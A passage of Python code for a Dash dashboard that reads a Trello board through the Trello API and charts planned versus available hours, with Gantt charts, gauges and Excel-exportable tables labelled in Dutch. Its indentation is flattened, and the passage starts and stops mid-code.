trello_base_url = 'https://api.trello.com/1/'
board_url = trello_base_url + 'boards/' + value
url_cards = (board_url +
'?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'
+ keys)
url_lists = board_url + '/lists?filter=all&' + keys
url_customfields = board_url + '/customFields?' + keys
url_labels = board_url + '/labels?' + keys
url_members = board_url + '/members?' + keys
board = json.loads(json.dumps(requests.get(url_cards).json()))
lists = json.loads(json.dumps(requests.get(url_lists).json()))
customfields = json.loads(json.dumps(requests.get(url_customfields).json())
)
labels = json.loads(json.dumps(requests.get(url_labels).json()))
members = json.loads(json.dumps(requests.get(url_members).json()))
cards = board['cards']
def dateCalc(date):
try:
newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')
return newdate
except:
return None
customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},
'checkbox': {}}
for i in customfields:
customfields_dict[i['type']] = {}
for i in customfields:
customfields_dict[i['type']][i['id']] = {}
for i in customfields:
if i['type'] == 'list':
customfields_dict[i['type']][i['id']]['name'] = i['name']
customfields_dict['list'][i['id']]['options'] = {}
for j in i['options']:
customfields_dict['list'][i['id']]['options'][j['id']] = j[
'value'].get('text')
else:
customfields_dict[i['type']][i['id']]['name'] = i['name']
chosenlists = []
for i in config.get('Not Started'):
chosenlists.append(i)
chosenlists.extend(config.get('Blocked'))
chosenlists.extend(config.get('Doing'))
chosenlists.extend(config.get('Done'))
for i in config.get('Epics'):
chosenlists.append(i)
for i in config.get('Always continuing'):
chosenlists.append(i)
for i in config.get('List with Epics Done'):
chosenlists.append(i)
def idtodate(cardid):
hex = cardid[0:8]
timestamp = int(hex, 16)
timedate = datetime.fromtimestamp(timestamp)
return timedate
def get_epicid(url):
try:
if 'epicId=' in url:
start = url.find('epicId=') + 7
end = url.find('&attachmentId=')
return url[start:end]
else:
pass
except:
pass
kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i
['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':
idtodate(i['id']), 'labels': [label['name'] for label in i['labels'
] if i['labels'] != []], 'members': [member['fullName'] for member in
members if member['id'] in i['idMembers']], 'Sjabloon': i[
'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i
['closed'], 'epicid': [get_epicid(j['url']) for j in i[
'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in
cards}
for i, j in kaarten.items():
while None in j['epicid']:
j['epicid'].remove(None)
if j['members'] != []:
j['Leden'] = ''
for k in j['members']:
if j['Leden'] == '':
j['Leden'] += k
else:
j['Leden'] += ', ' + k
else:
j['Leden'] = None
del j['members']
if customfields_dict != {}:
for i, j in customfields_dict.items():
for k, l in j.items():
for m, n in kaarten.items():
n[l['name']] = None
for i, j in kaarten.items():
for k in j['customfields']:
if k['idCustomField'] in customfields_dict['list'].keys():
j[customfields_dict['list'][k['idCustomField']].get('name')
] = customfields_dict['list'][k['idCustomField']][
'options'].get(k['idValue'])
elif k['idCustomField'] in customfields_dict['checkbox'].keys(
):
if k['value']['checked'] == 'true':
j[customfields_dict['checkbox'][k['idCustomField']]
.get('name')] = True
else:
j[customfields_dict['checkbox'][k['idCustomField']]
.get('name')] = False
elif k['idCustomField'] in customfields_dict['date'].keys():
j[customfields_dict['date'][k['idCustomField']].get('name')
] = dateCalc(k['value'].get('date'))
else:
for key in k['value']:
j[customfields_dict[key][k['idCustomField']].get(
'name')] = k['value'].get(key)
epicIdNameCategory = []
for i, j in kaarten.items():
epicIdNameCategory.append((i, j['Naam'], j[config.get(
'Custom Field for Categories')]))
for i, j in kaarten.items():
if j['epicid'] == []:
j['Epic'] = 'Geen epic'
j['Categorie'] = None
else:
for k in epicIdNameCategory:
if k[0] == j['epicid'][0]:
j['Epic'] = k[1]
j['Categorie'] = k[2]
del j['epicid']
for i, j in kaarten.items():
for k in lists:
if j['ListID'] == k['id']:
j['Lijst'] = k['name']
if j['Lijst'] in config.get('Not Started'):
j['Status'] = 'Niet gestart'
elif j['Lijst'] in config.get('Doing'):
j['Status'] = 'Doing'
elif j['Lijst'] in config.get('Blocked'):
j['Status'] = 'Blocked'
elif j['Lijst'] in config.get('Done'):
j['Status'] = 'Done'
elif j['Lijst'] in config.get('Always continuing'):
j['Status'] = 'Doorlopend'
elif j['Lijst'] in config.get('Epics'):
j['Status'] = 'Epics Doing'
elif j['Lijst'] in config.get('List with Epics Done'):
j['Status'] = 'Epics Done'
else:
j['Status'] = 'Archived'
del j['customfields']
del j['ListID']
for i, j in kaarten.items():
if j['Gearchiveerd'] == True and j['Status'] != 'Done':
j['Status'] = 'Archived'
liststodelete = []
for i in lists:
if i['name'] not in chosenlists:
liststodelete.append(i['name'])
cardstodelete = []
for i, j in kaarten.items():
if j['Sjabloon'] == True:
cardstodelete.append(i)
elif j['Lijst'] in liststodelete:
cardstodelete.append(i)
hours = {}
for i, j in kaarten.items():
if j['Lijst'] == config.get('List for hours'):
hours[j['Naam']] = {config['Custom Field for Starting date']: j
[config['Custom Field for Starting date']], config[
'Custom Field for Ending date']: j[config[
'Custom Field for Ending date']], config[
'Custom Field with hours']: j[config[
'Custom Field with hours']]}
for i in cardstodelete:
if i in kaarten:
del kaarten[i]
tmpdatesdict = {}
now = datetime.now().date()
numdays = 365
numdayshistory = 183
for x in range(0, numdays):
tmpdatesdict[str(now + timedelta(days=x))] = {}
for x in range(0, numdayshistory):
tmpdatesdict[str(now - timedelta(days=x))] = {}
dates = []
for i in sorted(tmpdatesdict):
dates.append(i)
arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten
.values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i
[5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(
i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(
[card['Status'] for card in kaarten.values()])), config.get(
'Custom Field for Categories'): list(dict.fromkeys([card[config.get
('Custom Field for Categories')] for card in kaarten.values()])),
config.get('Custom Field for Person'): list(dict.fromkeys([(card[
config.get('Custom Field for Person')] if card[config.get(
'Custom Field for Person')] != None else 'Geen ' + config.get(
'Custom Field for Person')) for card in kaarten.values()]))}
try:
urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
get('Custom Field for Starting date'): kaart[config.get(
'Custom Field for Starting date')], config.get(
'Custom Field for Ending date'): kaart[config.get(
'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],
config.get('Custom Field for Person'): kaart[config.get(
'Custom Field for Person')], config.get(
'Custom Field for Categories'): kaart[config.get(
'Custom Field for Categories')], config.get(
'Custom Field with hours'): kaart[config.get(
'Custom Field with hours')], 'Cognosrapport': kaart[
'Cognosrapport'], 'Niet meenemen in telling': kaart[
'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':
kaart['Status'], 'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for
kaart in kaarten.values()}
except:
urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
get('Custom Field for Starting date'): kaart[config.get(
'Custom Field for Starting date')], config.get(
'Custom Field for Ending date'): kaart[config.get(
'Custom Field for Ending date')], config.get(
'Custom Field for Person'): kaart[config.get(
'Custom Field for Person')], config.get(
'Custom Field for Categories'): kaart[config.get(
'Custom Field for Categories')], config.get(
'Custom Field with hours'): kaart[config.get(
'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':
kaart['Status'], 'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for
kaart in kaarten.values()}
beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in
hours.keys()}
for i in dates:
datekey = datetime.strptime(i, '%Y-%m-%d').date()
for k, l in kaarten.items():
if l['Niet meenemen in telling'] != True:
try:
if l[config.get('Custom Field for Starting date')].date(
) < datekey <= l[config.get(
'Custom Field for Ending date')].date():
delta = l[config.get('Custom Field for Ending date')
] - l[config.get('Custom Field for Starting date')]
hoursperday = int(l[config.get(
'Custom Field with hours')]) / int(delta.days)
urenperdagperkaart[l['Naam']]['urenperdag'][i
] = hoursperday
except:
pass
for k, l in hours.items():
try:
if l[config.get('Custom Field for Starting date')].date(
) < datekey <= l[config.get('Custom Field for Ending date')
].date():
hoursperday = int(l[config.get('Custom Field with hours')]
) / int(30.4)
beschikbareuren[k]['urenperdag'][i] = hoursperday
except:
pass
for i, j in urenperdagperkaart.items():
for k, l in j['urenperdag'].items():
for m in j['urenperperiode'].keys():
if m == k[0:4] + k[5:7]:
j['urenperperiode'][m] += l
for i, j in beschikbareuren.items():
for k, l in j['urenperdag'].items():
for m in j['urenperperiode'].keys():
if m == k[0:4] + k[5:7]:
j['urenperperiode'][m] += l
dfurenpermaand = copy.deepcopy(urenperdagperkaart)
for i, j in dfurenpermaand.items():
try:
j['Geplande uren'] = int(j['Geplande uren'])
except:
j['Geplande uren'] = 0
for k, l in j['urenperperiode'].items():
j[k] = round(l, 2)
del j['urenperperiode']
bars = []
labelsnietingepland = []
for j in kaarten.values():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
labelsnietingepland.append(j['Lijst'])
labelsnietingepland = list(dict.fromkeys(labelsnietingepland))
for i, j in kaarten.items():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
tmp = []
for label in labelsnietingepland:
if j['Lijst'] == label:
tmp.append(int(j['Geplande uren']))
else:
tmp.append(0)
bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],
type='bar', opacity='0.6'))
epicbars = []
tmpepicsforbarchart = {epic: (0) for epic in [name['Naam'] for name in
kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}
tmpepicsforbarchart['Geen epic'] = 0
for i, j in kaarten.items():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
tmpepicsforbarchart[j['Epic']] += int(j[config.get(
'Custom Field with hours')])
epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}
epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[
value for value in epicsforbarchart.values()], type='bar', text=[
value for value in epicsforbarchart.values()], textposition=
'outside', opacity='0.6'))
thismonth = datetime.strftime(datetime.now(), '%Y%m')
nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')
twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')
arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,
'%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,
'%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,
'%Y%m').strftime('%B'))]
gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
thismonth]))
gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
nextmonth]))
gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
twomonths]))
deltathismonth = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == thismonth]))
deltanextmonth = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == nextmonth]))
deltatwomonths = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == twomonths]))
if deltathismonth > gaugegeplandthismonth:
gaugerangethismonth = deltathismonth + 20
else:
gaugerangethismonth = gaugegeplandthismonth + 20
if deltanextmonth > gaugegeplandnextmonth:
gaugerangenextmonth = deltanextmonth + 20
else:
gaugerangenextmonth = gaugegeplandnextmonth + 20
if deltatwomonths > gaugegeplandtwomonths:
gaugerangetwomonths = deltatwomonths + 20
else:
gaugerangetwomonths = gaugegeplandtwomonths + 20
gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *
0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5,
deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [
deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},
{'range': [deltathismonth * 0.9, deltathismonth], 'color':
'#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}
gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *
0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5,
deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [
deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},
{'range': [deltanextmonth * 0.9, deltanextmonth], 'color':
'#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}
gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *
0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5,
deltatwomonths * 0.75], 'color': '#b4eb34'}, {'range': [
deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},
{'range': [deltatwomonths * 0.9, deltatwomonths], 'color':
'#eb6e34'}, {'range': [deltatwomonths, gaugerangetwomonths],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}
gaugefig = go.Figure()
gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 1]},
value=gaugegeplandthismonth, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').
strftime('%B')}, delta={'reference': deltathismonth}, gauge=
gaugestepsthismonth))
gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},
value=gaugegeplandnextmonth, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').
strftime('%B')}, delta={'reference': deltanextmonth}, gauge=
gaugestepsnextmonth))
gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},
value=gaugegeplandtwomonths, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').
strftime('%B')}, delta={'reference': deltatwomonths}, gauge=
gaugestepstwomonths))
gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,
'gaugefig': gaugefig}
columntypes = {}
for key, value in kaarten[next(iter(kaarten))].items():
if 'datum' in key or key == 'Aangemaakt':
columntypes[key] = 'datetime'
elif type(value) == int:
columntypes[key] = 'numeric'
elif type(value in [str, bool]):
columntypes[key] = 'text'
columntypesurenpermaand = dict(columntypes)
columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})
data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':
urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':
graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,
'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=
dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}
def make_layout():
return html.Div(className='First Div', children=[html.Div(style={
'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',
'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',
'background':
'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)'
, 'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',
'margin-left': '1%', 'border-radius': '10px', 'text-align':
'center'}, className='Banner', children=[html.Div(style={'display':
'inline-block', 'width': '80%'}, children=[html.H1(
'Trello borden USD')]), html.Div(style={'display': 'inline-block',
'margin-right': '1px'}, children=[html.Img(src=app.get_asset_url(
'logonop.png'), style={'width': '150px', 'margin-right': '0px'})])]
), html.H5('Kies hieronder een bord', style={'text-align': 'center'
}), dcc.Dropdown(id='dropdown_boards', options=[{'label': i['name'],
'value': i['id']} for i in boards], value=boards[0]['id']), html.
Button('Data verversen', id='refreshdatabtn', n_clicks=0), html.Div
(id='test')])
<|reserved_special_token_0|>
@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'
), Input('refreshdatabtn', 'n_clicks')])
def create_maindiv(value, n_clicks):
get_data(value)
import os
if os.name == 'nt':
daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')
else:
daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')
return html.Div(className='', children=[dcc.Markdown(
'**Laatst ververst: **' + daterefreshed), dcc.Tabs(className='Tabs',
children=[dcc.Tab(label='Gantt charts', style=globals['styles'][
'tabs'], children=[html.Div(className='tab2_div1', style=globals[
'styles']['maindivs'], children=[html.H3('Uitleg'), html.Div(style=
globals['styles']['divgraphs'], children=[dcc.Markdown(
'In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'
)])]), html.Div(className='tab2_div2', style=globals['styles'][
'maindivs'], children=[html.H4('Gantt per epic'), dcc.Dropdown(
style=globals['styles']['dropdowns'], id='dropdownganttepics',
options=[{'label': name, 'value': name} for name in data['arrays'][
'epics']], value=[next(iter(data['arrays']['epics']))]), html.Div(
style=globals['styles']['divgraphs'], children=[dcc.Graph(id=
'ganttepics')])]), html.Div(className='tab2_div3', style=globals[
'styles']['maindivs'], children=[html.H4('Gantt per persoon'), dcc.
Dropdown(style=globals['styles']['dropdowns'], id=
'dropdownganttpersoon', options=[{'label': name, 'value': name} for
name in data['arrays'][config.get('Custom Field for Person')]]),
dcc.Dropdown(style=globals['styles']['dropdowns'], id=
'dropdownganttpersoonstatus', options=[{'label': name, 'value':
name} for name in data['arrays']['statuses']], value=data['arrays']
['statuses'], multi=True), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]), dcc.Tab
(label='Data export', style=globals['styles']['tabs'], children=[
html.Div(className='tab3_div1', style=globals['styles']['maindivs'],
children=[html.H3('Uitleg'), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Markdown(
"Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand."
), dcc.Markdown(
"In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'."
)])]), html.Div(className='tab3_div2', style=globals['styles'][
'maindivs'], children=[html.H4('Platte dump'), dcc.Markdown(
'Deze tabel laat de platte data zien, zoals in Trello gevuld.'),
dash_table.DataTable(id='table_plattedump', columns=[{'name': i,
'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable':
True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']
['columntypes'].keys()], data=data['dfs']['kaartendf'].to_dict(
'records'), hidden_columns=[i for i in data['dfs']['columntypes']],
export_format='xlsx', export_headers='display', export_columns=
'all', filter_action='native', sort_action='native', sort_mode=
'multi', style_table={'overflowX': 'scroll'}, style_header={
'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',
'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={
'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',
'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),
html.Div(className='tab3_div3', style=globals['styles']['maindivs'],
children=[html.H4('Uren per maand'), dcc.Markdown(
'Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'
), dcc.Markdown(
'Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'
), dash_table.DataTable(id='table_urenpermaand', columns=[{'name':
i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i),
'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in
data['dfs']['columntypesurenpermaand'].keys()], data=data['dfs'][
'urenpermaand'].to_dict('records'), hidden_columns=[i for i in data
['dfs']['columntypesurenpermaand']], export_format='xlsx',
export_headers='display', export_columns='all', filter_action=
'native', sort_action='native', sort_mode='multi', style_header={
'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',
'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={
'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',
'text-align': 'left', 'fontFamily': 'Arial'})])]), dcc.Tab(label=
'Langetermijnplanning', style=globals['styles']['tabs'], children=[
html.Div(className='maindivs', style=globals['styles']['maindivs'],
children=[html.H3('Uitleg'), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Markdown(
'In dit tabblad wordt een langetermijnplanning getoond.'), dcc.
Markdown('De focus hierbij ligt vooral op de categorieen.')])]),
html.Div(className='maindivs', style=globals['styles']['maindivs'],
children=[html.H4('Ingeplande uren per categorie'), dcc.Dropdown(
style=globals['styles']['dropdowns'], id='dropdownurenpermaand',
options=[{'label': name, 'value': name} for name in data['arrays'][
config.get('Custom Field for Categories')] if name != None], multi=
True, searchable=False, value=data['arrays'][config.get(
'Custom Field for Categories')]), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Graph(id='urenpermaand')])]), html.Div(
className='tab1_div3', style=globals['styles']['maindivs'],
children=[html.H4('Nog in te plannen uren (per lijst)'), dcc.
Markdown(
'*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'
), dcc.Markdown(
'*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'
), dcc.Markdown(
'*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'), dcc.
Markdown(
'**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'
), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
Graph(id='graph_nietingepland', figure={'data': data['graphdata'][
'nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),
html.Div(className='tab1_div4', style=globals['styles']['maindivs'],
children=[html.H4('Nog in te plannen uren (per epic)'), dcc.
Markdown(
'**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'
), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
Graph(id='graph_nietingepland_epics', figure={'data': data[
'graphdata']['nietingeplandepics'], 'layout': globals[
'graphlayouts']['bars']})])])]), dcc.Tab(style=globals['styles'][
'tabs'], label='Tactische planning', children=[html.Div(className=
'maindivs', style=globals['styles']['maindivs'], children=[html.H3(
'Uitleg'), dcc.Markdown(
'In dit tabblad is een middellange termijnplanning te zien.')]),
html.Div(className='maindivs', style=globals['styles']['maindivs'],
children=[html.H4('Totalen'), dcc.Markdown(
'Hieronder staan twee totaaloverzichten van de aankomende maanden.'
), dcc.Markdown(
'De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'
), dcc.Markdown(
'Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'
), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
Graph(figure=data['graphdata']['gaugefig'])])]), html.Div(className
='maindivs', style=globals['styles']['maindivs'], children=[html.H4
('Gantt'), dcc.Dropdown(style=globals['styles']['dropdowns'], id=
'dropdowngantttactisch', options=[{'label': j, 'value': i} for i, j in
data['arrays']['threemonths']], multi=False, searchable=False,
value=data['arrays']['threemonths'][0][0]), html.Div(style=globals[
'styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])
])])])
@app.callback(Output('gantttactisch', 'figure'), [Input(
'dropdowngantttactisch', 'value')])
def update_gantttactisch(v1):
if v1 != None:
if v1[4:] == '12':
v1plus1 = str(int(v1[0:4]) + 1) + '01'
else:
v1plus1 = str(int(v1) + 1)
if v1[4:] == '01':
v1min1 = str(int(v1[0:4]) - 1) + '12'
else:
v1min1 = str(int(v1) - 1)
if v1[4:] == '11':
v1plus2 = str(int(v1[0:4]) + 1) + '01'
else:
v1plus2 = str(int(v1) + 2)
import random
import numpy as np
from operator import itemgetter
ganttdata = []
monthkey = int(v1)
for i, j in data['kaarten'].items():
if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:
try:
if int(datetime.strftime(j['Begindatum'], '%Y%m')
) <= monthkey and int(datetime.strftime(j[
'Einddatum'], '%Y%m')) >= monthkey:
if j['Begindatum'].date() < datetime.strptime(
v1min1 + '01', '%Y%m%d').date():
start = datetime.strptime(v1min1 + '01', '%Y%m%d'
).date()
else:
start = j['Begindatum'].date()
if j['Einddatum'].date() >= datetime.strptime(
v1plus2 + '01', '%Y%m%d').date():
eind = datetime.strptime(v1plus2 + '01', '%Y%m%d'
).date()
else:
eind = j['Einddatum'].date()
ganttdata.append(dict(Task=j['Epic'], Start=start,
Finish=eind, Resource=j['Naam'] + ' (uren: ' +
str(round(data['urenperdagperkaart'][j['Naam']]
['urenperperiode'][v1])) + ')'))
except:
pass
result = sorted(ganttdata, key=itemgetter('Task'))
rgb = []
for c in range(len(result)):
r = list(np.random.choice(range(256), size=3))
s2 = ','.join(map(str, r))
s1 = 'rgb('
s3 = ')'
rgb.append(s1 + s2 + s3)
fig = ff.create_gantt(result, index_col='Resource', show_colorbar=
True, group_tasks=False, showgrid_x=True, showgrid_y=True,
colors=rgb)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4] + '-' + v1[4:] +
'-01', v1[0:4] + '-' + v1[4:] + '-01'], y=[-1, len(result)],
line={'shape': 'spline', 'color': 'black', 'width': 4},
showlegend=False))
fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4] + '-' +
v1plus1[4:] + '-01', v1plus1[0:4] + '-' + v1plus1[4:] + '-01'],
y=[-1, len(result)], line={'shape': 'spline', 'color': 'black',
'width': 4}, showlegend=False))
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
@app.callback(Output('ganttpersoon', 'figure'), [Input(
'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',
'value')])
def update_ganttpersoon(v1, v2):
ganttdata = []
for i, j in data['kaarten'].items():
if j[config.get('Custom Field for Person')] == v1 and j['Status'
] != 'Archived' and j['Status'] in v2:
try:
ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(
'Custom Field for Starting date')].date(), Finish=j[
config.get('Custom Field for Ending date')].date(),
Resource=j['Epic']))
except:
pass
if ganttdata != []:
fig = ff.create_gantt(ganttdata, index_col='Resource',
show_colorbar=True, showgrid_x=True, showgrid_y=True)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',
'value')])
def update_ganttepics(value):
ganttdata = []
for i, j in data['kaarten'].items():
if j['Epic'] == value and j['Status'] != 'Archived':
try:
ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(
'Custom Field for Starting date')].date(), Finish=j[
config.get('Custom Field for Ending date')].date(),
Resource=j['Status']))
except:
pass
if ganttdata != []:
fig = ff.create_gantt(ganttdata, index_col='Resource',
show_colorbar=True, showgrid_x=True, showgrid_y=True)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
@app.callback(Output('urenpermaand', 'figure'), [Input(
'dropdownurenpermaand', 'value')])
def update_urenpermaand(value):
layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)', xaxis={'title': 'Datum', 'gridcolor': 'gray'},
yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})
bars = []
if 'Regulier werk' in value:
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for value in
data['urenperdagperkaart'].values() if value[config.get(
'Custom Field for Categories')] == 'Regulier werk']), 0))
bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis, name=
'Regulier werk', line={'shape': 'spline', 'smoothing': 0.4},
mode='lines+markers', marker={'symbol': 'triangle-up-open',
'size': 10}, stackgroup='one'))
for categorie in data['arrays'][config.get('Custom Field for Categories')]:
if categorie in value and categorie != 'Regulier werk':
if categorie == None:
categorienaam = 'Geen categorie'
else:
categorienaam = categorie
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for
value in data['urenperdagperkaart'].values() if value[
